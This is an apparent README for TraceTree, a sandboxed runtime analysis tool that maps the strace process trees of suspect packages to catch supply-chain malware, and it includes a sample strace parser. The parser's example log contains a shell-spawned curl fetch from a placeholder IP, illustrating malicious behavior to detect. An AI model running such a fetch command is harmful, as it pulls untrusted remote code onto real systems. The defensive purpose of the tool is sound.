TraceTree
TraceTree - Runtime behavioral analysis tool that maps the process cascade of suspicious packages into a directed tree, catching supply chain attacks that install-time scanners miss.
Runtime behavioral analysis for Python packages, npm modules, DMG and EXE files — catching supply chain attacks that install-time scanners miss.

How It Works
TraceTree executes suspicious packages inside an isolated Docker sandbox. Right after the initial download starts, it drops the container's network interface. Any malicious outbound connection attempt is still triggered and logged, but no traffic actually leaves the container.
A regex engine parses the strace output, tracks system calls (like clone, execve, socket, and openat), and builds a directed graph using NetworkX. Finally, a RandomForestClassifier trained on known malware evaluates the graph's topology to detect anomalous behavior.
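The parsing step described above can be sketched roughly as follows. This is a minimal illustration, not TraceTree's actual parser: it assumes log lines in the `<pid> <syscall>(<args>) = <result>` shape that `strace -f -o <file>` writes, uses plain dictionaries in place of a NetworkX graph to stay dependency-free, and the names `LINE_RE`, `parse_strace`, and `SAMPLE_LOG` are hypothetical.

```python
import re
from collections import defaultdict

# Assumed line shape: "<pid> <syscall>(<args>) = <result> [errno text]"
LINE_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<name>\w+)\((?P<args>.*)\)\s+=\s+(?P<ret>-?\d+)"
)

def parse_strace(lines):
    """Return (children, events) extracted from strace log lines.

    children maps a parent pid to the pids it spawned.
    events maps a pid to a list of (syscall, detail) tuples.
    """
    children = defaultdict(list)
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip signals, unfinished calls, and other noise
        pid, name = int(m["pid"]), m["name"]
        args, ret = m["args"], int(m["ret"])
        if name in ("clone", "fork", "vfork") and ret > 0:
            # A positive return value is the pid of the new child.
            children[pid].append(ret)
        elif name == "execve":
            path = re.match(r'"([^"]*)"', args)
            events[pid].append(("execve", path.group(1) if path else args))
        elif name == "connect":
            # Record the attempt even when it failed (e.g. network dropped).
            addr = re.search(r'inet_addr\("([^"]+)"\)', args)
            events[pid].append(("connect", addr.group(1) if addr else "?"))
    return children, events

# Illustrative log lines (made up for this example).
SAMPLE_LOG = [
    '100 execve("/usr/bin/pip", ["pip", "install", "example-pkg"], 0x7ffd3c0 /* 12 vars */) = 0',
    '100 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f0000000a10) = 101',
    '101 execve("/bin/sh", ["sh", "-c", "curl http://203.0.113.7/x"], 0x7ffd3c0 /* 12 vars */) = 0',
    '101 connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("203.0.113.7")}, 16) = -1 ENETUNREACH (Network is unreachable)',
]

children, events = parse_strace(SAMPLE_LOG)
```

Here `children` links pid 100 to pid 101, and `events[101]` holds the shell launch followed by the blocked connection attempt. In a NetworkX-based version, each parent/child pair would become a directed edge.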
Installation
You need Python 3.9+ and Docker running on your machine.
git clone https://github.com/tejasprasad2008-afk/TraceTree.git
cd TraceTree
# Install the CLI tool in editable mode
pip install -e .
Usage
The pipeline is controlled via a Typer CLI.
# Analyze a PyPI package
cascade-analyze requests
# Evaluate standard dependency files
cascade-analyze requirements.txt
cascade-analyze package.json
# Analyze compiled installers
cascade-analyze malicious_app.dmg
cascade-analyze payload.exe
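The commands above take several kinds of target through one entry point. One way such dispatch could work is sketched below. This is an assumption for illustration only, not the tool's documented behavior: the function name `classify_target` and the returned labels are hypothetical.

```python
from pathlib import Path

def classify_target(target: str) -> str:
    """Guess what kind of input a CLI argument refers to (hypothetical labels)."""
    name = Path(target).name.lower()
    if name == "requirements.txt":
        return "pip-requirements"
    if name == "package.json":
        return "npm-manifest"
    suffix = Path(name).suffix
    if suffix == ".dmg":
        return "dmg"
    if suffix == ".exe":
        return "exe"
    # Anything else is treated as a bare package name.
    return "pypi-package"
```

Under this sketch, a bare name such as `requests` falls through to the package case, while file names are recognized by their name or extension.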
Advanced Training & Dataset Ingestion
TraceTree features an Online Training Pipeline that can fetch live malware samples from MalwareBazaar.
Local Training
If you want to train the model locally using the datasets in data/:
# Start the interactive training pipeline
cascade-train
During cascade-train, you will be prompted for a MalwareBazaar Auth Key. If provided, the tool will:
- Ingest: Fetch the latest malicious Python samples from MalwareBazaar.
- Sandbox: Run them through the Docker pipeline to extract fresh behavioral footprints.
- Train: Refit the Random Forest model on the dataset extended with the new samples.
- Sync: Automatically cache the new model locally.
Model Synchronization
To fetch the latest pre-trained model directly from the global cloud storage:
# Force download the latest global model
cascade-update
Who Is This For
- Security Researchers: Hunting undocumented supply chain behavior.
- DevOps / DevSecOps: Validating the runtime safety of injected dependencies.
- Software Engineers: Profiling the exact syscall requirements of applications.
Architecture
The pipeline is split into 5 core modules:
- /sandbox: Manages the Docker container lifecycle and actively restricts networking during testing.
- /monitor: Parses the strace log to track execution paths and network attempts.
- /graph: Uses networkx to translate parent/child process relationships into an edge graph.
- /ml: Feeds the extracted graph features into a RandomForestClassifier for anomaly detection.
- /cli: The Typer entrypoint that orchestrates the pipeline and renders the terminal UI.
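To make the hand-off between the graph and ml stages concrete, here is a minimal sketch of turning a process tree into numeric features. The README does not list the features TraceTree actually uses, so this feature set (node count, depth, maximum fan-out) and the name `tree_features` are assumptions. The tree is a plain dict mapping each parent pid to its child pids rather than a networkx graph.

```python
def tree_features(children, root):
    """Compute simple topology features for the process tree rooted at `root`.

    children: dict mapping a parent pid to a list of child pids.
    """
    node_count = 0
    max_depth = 0
    max_fanout = 0
    stack = [(root, 0)]  # iterative depth-first walk: (pid, depth)
    while stack:
        pid, depth = stack.pop()
        node_count += 1
        max_depth = max(max_depth, depth)
        kids = children.get(pid, [])
        max_fanout = max(max_fanout, len(kids))
        stack.extend((kid, depth + 1) for kid in kids)
    return {"nodes": node_count, "depth": max_depth, "max_fanout": max_fanout}

# Example: pid 1 spawns 2 and 3, and pid 2 spawns 4.
features = tree_features({1: [2, 3], 2: [4]}, root=1)
# features == {"nodes": 4, "depth": 2, "max_fanout": 2}
```

A vector built from values like these is the kind of input a RandomForestClassifier can be fitted on.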

Threat Model
In March 2024, the highly obfuscated XZ Utils backdoor (CVE-2024-3094) was disclosed after it had bypassed standard static scanning. Advanced supply chain malware often hides malicious operations deep within legitimate-looking test code or delayed payload fetches. By analyzing the runtime execution graph, TraceTree sidesteps code obfuscation and shows which external files, commands, and sockets a package actually tries to open.
Contributing
Pull requests are welcome. Please ensure new features remain decoupled across the existing architecture.
License
MIT
